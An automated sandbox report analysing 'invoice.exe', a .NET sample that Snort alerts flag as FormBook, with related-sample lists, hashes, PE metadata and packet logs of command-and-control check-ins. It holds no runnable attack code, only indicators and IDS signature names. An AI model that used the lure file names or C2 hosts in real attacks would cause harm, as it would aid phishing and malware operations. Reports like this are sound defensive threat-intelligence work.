                                                                            RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.25
                                                                            swift_76567643.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.24
                                                                            PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.24
                                                                            yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.25
                                                                            Swift.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.24
                                                                            TNUiVpymgH.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.24
                                                                            g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.25
                                                                            Original Invoice-COAU7230734290.xlsxGet hashmaliciousBrowse
                                                                            • 192.0.78.25
                                                                            TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.231
                                                                            Swift Advise.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.24
                                                                            RMwfvA9kZy.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.25
                                                                            vfe1GoeC5F.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.24
                                                                            New Purchase Order GH934782GHY489330.exeGet hashmaliciousBrowse
                                                                            • 192.0.78.24
                                                                            AMAZON-02USCalt7BoW2a.exeGet hashmaliciousBrowse
                                                                            • 3.14.206.30
                                                                            0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                            • 52.40.12.112
                                                                            TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                            • 52.216.152.43
                                                                            1wOdXavtlE.exeGet hashmaliciousBrowse
                                                                            • 52.216.179.59
                                                                            hvEop8Y70Y.exeGet hashmaliciousBrowse
                                                                            • 15.165.26.252
                                                                            8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                            • 3.13.255.157
                                                                            eQLPRPErea.exeGet hashmaliciousBrowse
                                                                            • 13.248.216.40
                                                                            vbc.exeGet hashmaliciousBrowse
                                                                            • 3.13.255.157
                                                                            o2KKHvtb3c.exeGet hashmaliciousBrowse
                                                                            • 18.218.104.192
                                                                            Order Inquiry.exeGet hashmaliciousBrowse
                                                                            • 3.14.206.30
                                                                            6IGbftBsBg.exeGet hashmaliciousBrowse
                                                                            • 104.192.141.1
                                                                            nicoleta.fagaras-DHL_TRACKING_1394942.htmlGet hashmaliciousBrowse
                                                                            • 52.218.213.96
                                                                            PaymentAdvice.exeGet hashmaliciousBrowse
                                                                            • 3.14.206.30
                                                                            ikoAImKWvI.exeGet hashmaliciousBrowse
                                                                            • 104.192.141.1
                                                                            BL01345678053567.exeGet hashmaliciousBrowse
                                                                            • 3.14.206.30
                                                                            AL JUNEIDI LIST.xlsxGet hashmaliciousBrowse
                                                                            • 65.0.168.152
                                                                            DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                            • 65.0.168.152
                                                                            Statement of Account.xlsxGet hashmaliciousBrowse
                                                                            • 15.165.26.252
                                                                            Shipping Documents.xlsxGet hashmaliciousBrowse
                                                                            • 52.217.8.51
                                                                            bmws51TeIm.exeGet hashmaliciousBrowse
                                                                            • 3.141.177.1

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.log
                                                                            Process:C:\Users\user\Desktop\invoice.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1314
                                                                            Entropy (8bit):5.350128552078965
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.214342330666735
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:invoice.exe
                                                                            File size:894464
                                                                            MD5:492017e064cab97dd8ea27abd3e5cfca
                                                                            SHA1:a3addbdea8245b2e16c6ef551755b9d0e66e8e2b
                                                                            SHA256:524306af2db603c7db95227603c3014b67c27cfb2f88d12de2a599ece24575e2
                                                                            SHA512:66d5180a58dfaf4f1971480090197115c76af46e46098e6b33ec2d6f30d63b40e45f13f29e41b7b19cb8dc3a0dd24c1846fb45009c6f10c5419d30fcf6208a13
                                                                            SSDEEP:12288:/eGIIK2eESBAcIRUpDrV5F4pO9q7d36dQc8fZVa0RdYrLST8BHVlnwC5IKUaE+:/e5IV6AVUF5Ipb/cmES4VlnFI/
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n`..............P..^...F......~|... ........@.. ....................................@................................

                                                                            File Icon

                                                                            Icon Hash:e8d4ae708e8ec461

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4a7c7e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x606EACE1 [Thu Apr 8 07:12:33 2021 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa7c2c0x4f.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x3422c.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000xa5c840xa5e00False0.789592360588data7.55515603565IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0xa80000x3422c0x34400False0.389877392344data5.76163363059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0xde0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_ICON0xa82200x521ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            RT_ICON0xad4500x6f5aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            RT_ICON0xb43bc0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                            RT_ICON0xc4bf40x94a8data
                                                                            RT_ICON0xce0ac0x5488data
                                                                            RT_ICON0xd35440x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 15794175, next used block 4294902528
                                                                            RT_ICON0xd777c0x25a8data
                                                                            RT_ICON0xd9d340x10a8data
                                                                            RT_ICON0xdadec0x988data
                                                                            RT_ICON0xdb7840x468GLS_BINARY_LSB_FIRST
                                                                            RT_GROUP_ICON0xdbbfc0x92data
                                                                            RT_VERSION0xdbca00x38adata
                                                                            RT_MANIFEST0xdc03c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Version Infos

                                                                            DescriptionData
                                                                            Translation0x0000 0x04b0
                                                                            LegalCopyrightCopyright 2016 Computer City
                                                                            Assembly Version1.12.0.2
                                                                            InternalNameCharTypeInfo.exe
                                                                            FileVersion1.12.0.2
                                                                            CompanyNameComputer City
                                                                            LegalTrademarks
                                                                            Comments
                                                                            ProductNameUnmanagedAccessor
                                                                            ProductVersion1.12.0.2
                                                                            FileDescriptionUnmanagedAccessor
                                                                            OriginalFilenameCharTypeInfo.exe

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            04/08/21-12:04:21.809030TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.5184.168.131.241
                                                                            04/08/21-12:04:21.809030TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.5184.168.131.241
                                                                            04/08/21-12:04:21.809030TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.5184.168.131.241
                                                                            04/08/21-12:04:59.252139TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.5208.91.197.91
                                                                            04/08/21-12:04:59.252139TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.5208.91.197.91
                                                                            04/08/21-12:04:59.252139TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.5208.91.197.91
                                                                            04/08/21-12:05:07.034640ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                                                            04/08/21-12:05:08.358998ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                                                            04/08/21-12:05:18.088414TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973280192.168.2.5177.55.108.130
                                                                            04/08/21-12:05:18.088414TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973280192.168.2.5177.55.108.130
                                                                            04/08/21-12:05:18.088414TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973280192.168.2.5177.55.108.130

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 8, 2021 12:04:21.632926941 CEST4971780192.168.2.5184.168.131.241
                                                                            Apr 8, 2021 12:04:21.808682919 CEST8049717184.168.131.241192.168.2.5
                                                                            Apr 8, 2021 12:04:21.808800936 CEST4971780192.168.2.5184.168.131.241
                                                                            Apr 8, 2021 12:04:21.809030056 CEST4971780192.168.2.5184.168.131.241
                                                                            Apr 8, 2021 12:04:21.984464884 CEST8049717184.168.131.241192.168.2.5
                                                                            Apr 8, 2021 12:04:22.028017998 CEST8049717184.168.131.241192.168.2.5
                                                                            Apr 8, 2021 12:04:22.028047085 CEST8049717184.168.131.241192.168.2.5
                                                                            Apr 8, 2021 12:04:22.028240919 CEST4971780192.168.2.5184.168.131.241
                                                                            Apr 8, 2021 12:04:22.028343916 CEST4971780192.168.2.5184.168.131.241
                                                                            Apr 8, 2021 12:04:22.203593016 CEST8049717184.168.131.241192.168.2.5
                                                                            Apr 8, 2021 12:04:32.389282942 CEST4971880192.168.2.535.156.117.131
                                                                            Apr 8, 2021 12:04:32.407913923 CEST804971835.156.117.131192.168.2.5
                                                                            Apr 8, 2021 12:04:32.408046007 CEST4971880192.168.2.535.156.117.131
                                                                            Apr 8, 2021 12:04:32.408296108 CEST4971880192.168.2.535.156.117.131
                                                                            Apr 8, 2021 12:04:32.426136971 CEST804971835.156.117.131192.168.2.5
                                                                            Apr 8, 2021 12:04:32.428894997 CEST804971835.156.117.131192.168.2.5
                                                                            Apr 8, 2021 12:04:32.429075003 CEST4971880192.168.2.535.156.117.131
                                                                            Apr 8, 2021 12:04:32.429214954 CEST4971880192.168.2.535.156.117.131
                                                                            Apr 8, 2021 12:04:32.447406054 CEST804971835.156.117.131192.168.2.5
                                                                            Apr 8, 2021 12:04:37.530929089 CEST4971980192.168.2.52.57.90.16
                                                                            Apr 8, 2021 12:04:37.571005106 CEST80497192.57.90.16192.168.2.5
                                                                            Apr 8, 2021 12:04:37.571151972 CEST4971980192.168.2.52.57.90.16
                                                                            Apr 8, 2021 12:04:37.571713924 CEST4971980192.168.2.52.57.90.16
                                                                            Apr 8, 2021 12:04:37.611814976 CEST80497192.57.90.16192.168.2.5
                                                                            Apr 8, 2021 12:04:37.611836910 CEST80497192.57.90.16192.168.2.5
                                                                            Apr 8, 2021 12:04:37.611850023 CEST80497192.57.90.16192.168.2.5
                                                                            Apr 8, 2021 12:04:37.612085104 CEST4971980192.168.2.52.57.90.16
                                                                            Apr 8, 2021 12:04:37.612297058 CEST4971980192.168.2.52.57.90.16
                                                                            Apr 8, 2021 12:04:37.652245045 CEST80497192.57.90.16192.168.2.5
                                                                            Apr 8, 2021 12:04:59.106825113 CEST4972580192.168.2.5208.91.197.91
                                                                            Apr 8, 2021 12:04:59.251840115 CEST8049725208.91.197.91192.168.2.5
                                                                            Apr 8, 2021 12:04:59.251971006 CEST4972580192.168.2.5208.91.197.91
                                                                            Apr 8, 2021 12:04:59.252139091 CEST4972580192.168.2.5208.91.197.91
                                                                            Apr 8, 2021 12:04:59.397062063 CEST8049725208.91.197.91192.168.2.5
                                                                            Apr 8, 2021 12:04:59.498363972 CEST8049725208.91.197.91192.168.2.5
                                                                            Apr 8, 2021 12:04:59.498404980 CEST8049725208.91.197.91192.168.2.5
                                                                            Apr 8, 2021 12:04:59.498425007 CEST8049725208.91.197.91192.168.2.5
                                                                            Apr 8, 2021 12:04:59.498682022 CEST4972580192.168.2.5208.91.197.91
                                                                            Apr 8, 2021 12:04:59.498739004 CEST4972580192.168.2.5208.91.197.91
                                                                            Apr 8, 2021 12:04:59.531753063 CEST8049725208.91.197.91192.168.2.5
                                                                            Apr 8, 2021 12:04:59.531820059 CEST4972580192.168.2.5208.91.197.91
                                                                            Apr 8, 2021 12:04:59.644556999 CEST8049725208.91.197.91192.168.2.5
                                                                            Apr 8, 2021 12:05:11.767712116 CEST4973180192.168.2.574.208.236.64
                                                                            Apr 8, 2021 12:05:11.899678946 CEST804973174.208.236.64192.168.2.5
                                                                            Apr 8, 2021 12:05:11.899977922 CEST4973180192.168.2.574.208.236.64
                                                                            Apr 8, 2021 12:05:11.900079012 CEST4973180192.168.2.574.208.236.64
                                                                            Apr 8, 2021 12:05:12.031223059 CEST804973174.208.236.64192.168.2.5
                                                                            Apr 8, 2021 12:05:12.034537077 CEST804973174.208.236.64192.168.2.5
                                                                            Apr 8, 2021 12:05:12.034565926 CEST804973174.208.236.64192.168.2.5
                                                                            Apr 8, 2021 12:05:12.034796953 CEST4973180192.168.2.574.208.236.64
                                                                            Apr 8, 2021 12:05:12.034859896 CEST4973180192.168.2.574.208.236.64
                                                                            Apr 8, 2021 12:05:12.165515900 CEST804973174.208.236.64192.168.2.5
                                                                            Apr 8, 2021 12:05:17.881434917 CEST4973280192.168.2.5177.55.108.130
                                                                            Apr 8, 2021 12:05:18.087061882 CEST8049732177.55.108.130192.168.2.5
                                                                            Apr 8, 2021 12:05:18.087527037 CEST4973280192.168.2.5177.55.108.130
                                                                            Apr 8, 2021 12:05:18.088413954 CEST4973280192.168.2.5177.55.108.130
                                                                            Apr 8, 2021 12:05:18.291481972 CEST8049732177.55.108.130192.168.2.5
                                                                            Apr 8, 2021 12:05:18.292332888 CEST8049732177.55.108.130192.168.2.5
                                                                            Apr 8, 2021 12:05:18.292355061 CEST8049732177.55.108.130192.168.2.5
                                                                            Apr 8, 2021 12:05:18.292543888 CEST4973280192.168.2.5177.55.108.130
                                                                            Apr 8, 2021 12:05:18.292608976 CEST4973280192.168.2.5177.55.108.130
                                                                            Apr 8, 2021 12:05:18.495742083 CEST8049732177.55.108.130192.168.2.5
                                                                            Apr 8, 2021 12:05:23.338290930 CEST4973480192.168.2.5192.0.78.24
                                                                            Apr 8, 2021 12:05:23.354049921 CEST8049734192.0.78.24192.168.2.5
                                                                            Apr 8, 2021 12:05:23.354183912 CEST4973480192.168.2.5192.0.78.24
                                                                            Apr 8, 2021 12:05:23.354604006 CEST4973480192.168.2.5192.0.78.24
                                                                            Apr 8, 2021 12:05:23.370249987 CEST8049734192.0.78.24192.168.2.5
                                                                            Apr 8, 2021 12:05:23.483477116 CEST8049734192.0.78.24192.168.2.5
                                                                            Apr 8, 2021 12:05:23.483500957 CEST8049734192.0.78.24192.168.2.5
                                                                            Apr 8, 2021 12:05:23.483649969 CEST4973480192.168.2.5192.0.78.24
                                                                            Apr 8, 2021 12:05:23.483750105 CEST4973480192.168.2.5192.0.78.24
                                                                            Apr 8, 2021 12:05:23.499483109 CEST8049734192.0.78.24192.168.2.5

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 8, 2021 12:03:15.073683977 CEST5221253192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:15.107563019 CEST53522128.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:15.243592978 CEST5430253192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:15.256288052 CEST53543028.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:15.258438110 CEST5378453192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:15.270612955 CEST53537848.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:15.706372976 CEST6530753192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:15.719813108 CEST53653078.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:15.722573042 CEST6434453192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:15.736054897 CEST53643448.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:16.338979006 CEST6206053192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:16.351699114 CEST53620608.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:18.154172897 CEST6180553192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:18.167529106 CEST53618058.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:18.795605898 CEST5479553192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:18.808784962 CEST53547958.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:19.236841917 CEST4955753192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:19.254936934 CEST53495578.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:19.832006931 CEST6173353192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:19.844795942 CEST53617338.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:20.705095053 CEST6544753192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:20.717613935 CEST53654478.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:21.448858023 CEST5244153192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:21.461405039 CEST53524418.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:22.880736113 CEST6217653192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:22.893364906 CEST53621768.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:25.878978014 CEST5959653192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:25.891555071 CEST53595968.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:26.643290043 CEST6529653192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:26.656200886 CEST53652968.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:27.609880924 CEST6318353192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:27.623181105 CEST53631838.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:44.317714930 CEST6015153192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:44.336030960 CEST53601518.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:49.234772921 CEST5973653192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:49.239942074 CEST5105853192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:49.240032911 CEST5263653192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:03:49.247836113 CEST53597368.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:49.251970053 CEST53510588.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:03:49.253436089 CEST53526368.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:04:08.718833923 CEST5696953192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:04:08.732348919 CEST53569698.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:04:21.582397938 CEST5516153192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:04:21.624262094 CEST53551618.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:04:32.059622049 CEST5475753192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:04:32.387444973 CEST53547578.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:04:37.486022949 CEST4999253192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:04:37.528493881 CEST53499928.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:04:42.619398117 CEST6007553192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:04:42.979065895 CEST53600758.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:04:48.228594065 CEST5501653192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:04:48.836759090 CEST53550168.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:04:51.358530045 CEST6434553192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:04:51.371253967 CEST53643458.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:04:53.898787022 CEST5712853192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:04:53.926758051 CEST53571288.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:04:58.948373079 CEST5479153192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:04:59.105505943 CEST53547918.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:03.749087095 CEST5046353192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:03.768049955 CEST53504638.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:04.512552977 CEST5039453192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:05.506127119 CEST5039453192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:06.521694899 CEST5039453192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:06.674634933 CEST53503948.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:07.034513950 CEST53503948.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:08.358870983 CEST53503948.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:11.724265099 CEST5853053192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:11.765930891 CEST53585308.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:17.043440104 CEST5381353192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:17.880172968 CEST53538138.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:18.316375971 CEST6373253192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:18.349823952 CEST53637328.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:23.309679031 CEST5734453192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:23.336853981 CEST53573448.8.8.8192.168.2.5
                                                                            Apr 8, 2021 12:05:27.472863913 CEST5445053192.168.2.58.8.8.8
                                                                            Apr 8, 2021 12:05:27.485549927 CEST53544508.8.8.8192.168.2.5
